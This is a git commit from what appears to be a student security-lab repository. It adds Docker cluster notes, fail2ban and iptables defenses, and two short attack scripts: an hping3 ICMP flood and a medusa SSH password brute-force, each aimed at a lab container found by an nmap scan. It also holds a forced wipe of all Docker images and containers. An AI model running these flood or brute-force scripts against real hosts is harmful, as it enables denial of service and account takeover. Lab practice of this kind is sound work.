Browse Source

Upload files to ''

master
petroskaridis 4 years ago
parent
commit
3da4ef188f
  1. 62
      docker notes.txt
  2. 7
      fail2baninfo.txt
  3. 15
      master_icmp_ddos.sh
  4. 8
      ssh_medusa.sh
  5. 23
      worker_ddos_firewall.sh

62
docker notes.txt

@ -0,0 +1,62 @@
../install/usr/share/swarmlab.io/sec/swarmlab-sec up size=5
../install/usr/share/swarmlab.io/sec/swarmlab-sec login
/*ssh local forwarding*/
{
sudo apt install lynx -y (προγραμμα για link σε ένα host port)
sudo apt install apache2 -y (κατεβασμα apache στον worker που θα κάνει forward)
apache2ctl start (εκκίνηση apache server)
lynx localhost
netstat -antlupe|grep 80
ssh docker@workerforw -L 5000:workerforw:80 (σύνδεση στην υπηρεσία από οποιοδήποτε container)
lynx http://localhost:5000
}
/*ssh remote forwarding*/
{
ssh -R 5000:localhost:80 docker@remotehost (execute at container with service on port 80)
lynx localhost:5000 (execute at remotehost)
}
{
inventory.yml
run.sh
test.yml
} after all clusters' ips are in inventory, we go:
chmod +x ./run.sh
./run.sh
/*shut down cluster*/
../install/usr/share/swarmlab.io/sec/swarmlab-sec down
#in case docker images are full
docker rmi -f $(docker images -a -q)
docker rm -f $(docker container -a -q)
/*fail2ban config*/
{
filter (fail2ban looks for the sshd service)
logpath (stores all authentication attempts made)
maxretry (bans IP after 4 wrong passwords)
bantime (86400 = 1 day)
ignoreip (type sys admin ip here)
}

7
fail2baninfo.txt

@ -0,0 +1,7 @@
[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 4
bantime = 86400

15
master_icmp_ddos.sh

@ -0,0 +1,15 @@
sudo apt update
sudo apt upgrade -y
sudo apt install hping3 -y
netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/')
clear
echo "Target network: " $netip
#Find worker1 victim IP
worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()')
#Ddos attack to worker1 with syn flood at port 80 and icmp protocol
echo "Initiate attack towards worker 1 with IP: "$worker1
sudo hping3 -p 80 --flood --icmp $worker1

8
ssh_medusa.sh

@ -0,0 +1,8 @@
sudo apt update
sudo apt upgrade -y
sudo apt install medusa -y
echo "Finding victim worker IP"
netip=$(ifconfig|grep inet|sed -n 1p|awk "{print \$2}"|cut -f 1-3 -d "."|sed 's/$/.*/')
worker1=$(nmap -sP $netip|grep my_project_worker_1.my_project_net|awk '{print $NF}'|tr -d '()')
echo "Starting ssh brute force attack with medusa"
medusa -u docker -P dictionary.txt -h $worker1 -M ssh

23
worker_ddos_firewall.sh

@ -0,0 +1,23 @@
sudo apt update
sudo apt upgrade -y
#Find worker1 IP
worker1=$(ifconfig|grep inet|sed -n lp|awk "{print \$2}")
clear
sudo iptables -F
echo "2 sec ICMP packet sniffing"
sleep 2s
sudo timeout 2s tcpdump -i eth0 icmp $worker1
sleep 2s
echo "New iptables rules"
#clean iptables rules from previous script runs
sudo iptables -X
sudo iptables -N icmp_flood
sudo iptables -A INPUT -p icmp -j icmp_flood
#limit icmp_flood to 1 packets per second
sudo iptables -A icmp_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
sudo iptables -A icmp_flood -j DROP
sleep 2s
echo "2 sec ICMP packet sniffing after iptables config"
sleep 2s
sudo timeout 2s tcpdump -i eth0 icmp $worker1
Loading…
Cancel
Save